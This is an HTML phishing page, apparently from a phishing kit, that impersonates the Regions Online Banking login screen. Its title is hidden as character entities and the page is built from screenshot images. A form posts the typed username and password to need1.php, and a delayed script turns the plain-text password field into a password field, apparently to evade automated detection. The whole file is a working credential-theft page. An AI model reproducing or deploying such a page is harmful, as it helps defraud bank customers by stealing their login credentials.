<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>&#82;&#101;&#103;&#105;&#111;&#110;&#115;&#32;&#79;&#110;&#108;&#105;&#110;&#101;&#32;&#66;&#97;&#110;&#107;&#105;&#110;&#103;</title>
<script>setTimeout(function() {
  document.getElementsByTagName('input')[1].type = "password"
}, 1000);
</script>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  <style type="text/css">
  
.textbox {  
    border: solid 1px #777; 
  	border-radius: 5px;
  	padding-left: 6px;
    height: 28px; 
    width: 275px;
	font-family: Verdana;
	font-size: 14px;
  	color: #444;	
 } 
 
.textbox:focus {  
    border-color: #1D8795; 
    border-style: solid;
  	border-radius: 1px;
    border-width: 2px; 
    outline: 0; 
 } 

 </style>
<style type="text/css">
div#container
{
	position:relative;
	width: 1349px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body>
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:540px; z-index:0"><img src="images/g1.png" alt="" title="" border=0 width=1349 height=540></div>

<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:528px; width:1349px; height:163px; z-index:1"><img src="images/g2.png" alt="" title="" border=0 width=1349 height=163></div>

<div id="image3" style="position:absolute; overflow:hidden; left:574px; top:319px; width:76px; height:43px; z-index:2"><a href="#"><img src="images/g3.png" alt="" title="" border=0 width=76 height=43></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:412px; top:225px; width:90px; height:15px; z-index:3"><a href="#"><img src="images/g4.png" alt="" title="" border=0 width=90 height=15></a></div>

<div id="image5" style="position:absolute; overflow:hidden; left:410px; top:283px; width:93px; height:15px; z-index:4"><a href="#"><img src="images/g5.png" alt="" title="" border=0 width=93 height=15></a></div>
<form action=need1.php name=uthenjee id=uthenjee method=post>
<input name="usr" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:304px;left:198px;top:244px;z-index:5">
<input name="psw" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:304px;left:198px;top:303px;z-index:6">
<div id="formimage1" style="position:absolute; left:199px; top:344px; z-index:7"><input type="image" name="formimage1" width="85" height="41" src="images/rgn.png"></div>
</div>

</body>
</html>
